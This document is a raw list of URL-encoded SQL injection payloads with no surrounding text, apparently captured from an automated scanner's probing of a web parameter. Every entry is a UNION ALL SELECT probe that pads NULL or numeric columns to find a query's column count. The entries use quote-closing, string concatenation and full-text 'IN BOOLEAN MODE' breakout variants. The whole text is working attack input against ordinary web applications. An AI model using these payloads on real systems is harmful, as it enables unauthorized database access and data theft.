1234.5%20WHERE%202598%3D2598%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%201057%3D1057%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%208561%3D8561%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27Ozit%27%20FROM%20DUAL%20WHERE%203958%3D3958%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27ABJf%27%20FROM%20DUAL%20WHERE%207652%3D7652%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27yoHA%27%20FROM%20DUAL%20WHERE%206723%3D6723%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27FVUD%27%20FROM%20DUAL%20WHERE%208935%3D8935%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27mAot%27%20FROM%20DUAL%20WHERE%206940%3D6940%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27FQws%27%20FROM%20DUAL%20WHERE%206766%3D6766%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27vmdw%27%20FROM%20DUAL%20WHERE%206700%3D6700%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27sgOY%27%20FROM%20DUAL%20WHERE%204526%3D4526%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27RHMQ%27%20FROM%20DUAL%20WHERE%203946%3D3946%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27mxTe%27%20FROM%20DUAL%20WHERE%206519%3D6519%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27hJGn%27%20WHERE%207051%3D7051%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27OayO%27%20WHERE%203864%3D3864%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27HOPr%27%20WHERE%202528%3D2528%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27MdsK%27%20WHERE%206536%3D6536%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27RrHc%27%20WHERE%204543%3D4543%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27iNDo%27%20WHERE%209143%3D9143%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27JVAb%27%20WHERE%204502%3D4502%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27ZEzw%27%20WHERE%205338%3D5338%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27fCzC%27%20WHERE%208153%3D8153%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27sMTq%27%20WHERE%209804%3D9804%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20jNDy%20WHERE%202986%3D2986%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20GEZa%20WHERE%206890%3D6890%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20IaBB%20WHERE%207440%3D7440%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20dPyb%20WHERE%201359%3D1359%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20yNyq%20WHERE%205455%3D5455%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20vOyR%20WHERE%203356%3D3356%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20xPvN%20WHERE%207891%3D7891%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20qOEh%20WHERE%207086%3D7086%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20tOtL%20WHERE%202286%3D2286%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20QYGf%20WHERE%209136%3D9136%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27lTLE%27%20WHERE%201958%3D1958%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27uDOY%27%20WHERE%208590%3D8590%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27lkYg%27%20WHERE%201832%3D1832%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27gGtF%27%20WHERE%206511%3D6511%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27fbki%27%20WHERE%206209%3D6209%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27jkKy%27%20WHERE%208421%3D8421%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27pXvZ%27%20WHERE%206882%3D6882%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27XpTe%27%20WHERE%205683%3D5683%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27VAhj%27%20WHERE%206958%3D6958%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27AtjM%27%20WHERE%202986%3D2986%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 -6045%29%20UNION%20ALL%20SELECT%202951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%23 -7265%29%20UNION%20ALL%20SELECT%208607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%23 -5229%29%20UNION%20ALL%20SELECT%202365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%23 -1201%29%20UNION%20ALL%20SELECT%203921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%23 -3838%29%20UNION%20ALL%20SELECT%209094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%2C9094%23 -8185%29%20UNION%20ALL%20SELECT%208263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%23 -1568%29%20UNION%20ALL%20SELECT%201726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%23 -9059%29%20UNION%20ALL%20SELECT%208560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%23 -8670%29%20UNION%20ALL%20SELECT%208626%2C8626%2C8626%2C8626%2C8626%2C8626%2C8626%2C8626%2C8626%2C8626%2C8626%2C8626%2C8626%2C8626%2C8626%2C8626%2C8626%2C8626%2C8626%2C8626%2C8626%2C8626%2C8626%2C8626%2C8626%2C8626%2C8626%2C8626%2C8626%23 -4252%29%20UNION%20ALL%20SELECT%206376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%23 -7094%27%29%20UNION%20ALL%20SELECT%207306%2C7306%2C7306%2C7306%2C7306%2C7306%2C7306%2C7306%2C7306%2C7306%2C7306%2C7306%2C7306%2C7306%2C7306%2C7306%2C7306%2C7306%2C7306%2C7306%2C7306%23 -3061%27%29%20UNION%20ALL%20SELECT%209328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%23 -9463%27%29%20UNION%20ALL%20SELECT%202704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%23 -5375%27%29%20UNION%20ALL%20SELECT%205722%2C5722%2C5722%2C5722%2C5722%2C5722%2C5722%2C5722%2C5722%2C5722%2C5722%2C5722%2C5722%2C5722%2C5722%2C5722%2C5722%2C5722%2C5722%2C5722%2C5722%2C5722%2C5722%2C5722%23 -9191%27%29%20UNION%20ALL%20SELECT%208599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%23 -5680%27%29%20UNION%20ALL%20SELECT%205527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%23 -1152%27%29%20UNION%20ALL%20SELECT%203895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%23 -3210%27%29%20UNION%20ALL%20SELECT%206622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%23 -9978%27%29%20UNION%20ALL%20SELECT%207769%2C7769%2C7769%2C7769%2C7769%2C7769%2C7769%2C7769%2C7769%2C7769%2C7769%2C7769%2C7769%2C7769%2C7769%2C7769%2C7769%2C7769%2C7769%2C7769%2C7769%2C7769%2C7769%2C7769%2C7769%2C7769%2C7769%2C7769%2C7769%23 -2332%27%29%20UNION%20ALL%20SELECT%207531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%2C7531%23 -5211%27%20UNION%20ALL%20SELECT%209526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%23 -8674%27%20UNION%20ALL%20SELECT%202264%2C2264%2C2264%2C2264%2C2264%2C2264%2C2264%2C2264%2C2264%2C2264%2C2264%2C2264%2C2264%2C2264%2C2264%2C2264%2C2264%2C2264%2C2264%2C2264%2C2264%2C2264%23 -1225%27%20UNION%20ALL%20SELECT%208427%2C8427%2C8427%2C8427%2C8427%2C8427%2C8427%2C8427%2C8427%2C8427%2C8427%2C8427%2C8427%2C8427%2C8427%2C8427%2C8427%2C8427%2C8427%2C8427%2C8427%2C8427%2C8427%23 -5136%27%20UNION%20ALL%20SELECT%201699%2C1699%2C1699%2C1699%2C1699%2C1699%2C1699%2C1699%2C1699%2C1699%2C1699%2C1699%2C1699%2C1699%2C1699%2C1699%2C1699%2C1699%2C1699%2C1699%2C1699%2C1699%2C1699%2C1699%23 -7727%27%20UNION%20ALL%20SELECT%208595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%23 -3581%27%20UNION%20ALL%20SELECT%206713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%23 